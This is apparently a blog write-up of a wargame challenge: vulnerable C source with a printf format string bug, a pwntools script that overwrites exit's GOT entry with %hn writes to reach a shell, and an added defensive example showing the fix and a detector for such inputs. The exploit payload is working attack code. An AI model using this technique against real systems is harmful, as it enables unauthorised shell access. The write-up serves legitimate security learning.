Lonely Nova's Workshop

dreamhack - basic_exploitation_002


Nova_ 2023. 4. 27. 14:59

- source code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}

void get_shell() {
    system("/bin/sh");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();

    read(0, buf, 0x80);
    printf(buf);    /* format string bug: user input is used as the format string */

    exit(0);
}

- exploit code

from pwn import *

p = remote("23.81.42.210",22878 )

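# get_shell = 0x8048609, written as two 16-bit halves with %hn
# high half 0x0804 = 2052, low half 0x8609 = 34313
# 34313 - 2052 = 32261 (extra characters needed before the second write)

exit_got = 0x804a024  # write target (assumed here to be the GOT entry of exit)

payload = p32(exit_got + 2) + p32(exit_got)
# the two addresses above already print 8 bytes, so 2052 - 8 = 2044
payload += b"%2044c%1$hn%32261c%2$hn"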

p.send(payload)

p.interactive()

- What I learned

Because 32-bit code uses the cdecl calling convention, the following two calls mean the same thing.

printf("\x12\x34\x56\x78%123c%1$n")

printf("%123c%1$n", "\x12\x34\x56\x78")
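The fix for the printf(buf) call in the source above, as an added example that is not part of the original post or the challenge: the same input rendered through the vulnerable pattern and through a constant format string, plus a small check that flags conversion directives in untrusted input. The function names and sample inputs are constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Demo only: silence the warnings that normally flag this bug at build time. */
#pragma GCC diagnostic ignored "-Wformat-security"
#pragma GCC diagnostic ignored "-Wformat-nonliteral"

/* Pattern from main() above: the input itself is the format string. */
int render_unsafe(char *out, size_t n, const char *input) {
    return snprintf(out, n, input);
}

/* Hardened pattern: constant format string, input is only data. */
int render_safe(char *out, size_t n, const char *input) {
    return snprintf(out, n, "%s", input);
}

/* 0 = no directive (only text or "%%"), 1 = some conversion directive,
   2 = a directive ending in 'n', i.e. one that writes to memory. */
int classify_format(const char *s) {
    int verdict = 0;
    for (; *s; s++) {
        if (*s != '%') continue;
        if (s[1] == '%') { s++; continue; }
        s++;
        /* skip flags, width, precision, positional "N$" and length modifiers */
        while (*s && strchr("0123456789$#-+ .*'hlLqjzt", *s)) s++;
        if (*s == '\0') return 1;   /* dangling or incomplete directive */
        if (*s == 'n') return 2;
        verdict = 1;
    }
    return verdict;
}

int main(void) {
    /* Constructed inputs; the benign "100%%" consumes no arguments. */
    const char *samples[] = { "100%%", "%x.%x", "%2044c%1$hn%32261c%2$hn" };
    char a[32], b[32];
    render_unsafe(a, sizeof a, samples[0]);
    render_safe(b, sizeof b, samples[0]);
    printf("unsafe: \"%s\"  safe: \"%s\"\n", a, b);
    for (size_t i = 0; i < 3; i++)
        printf("%-26s -> class %d\n", samples[i], classify_format(samples[i]));
    return 0;
}
```

In a real build, leave the warnings enabled (-Wformat -Wformat-security) so that a call like printf(buf) is reported at compile time.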
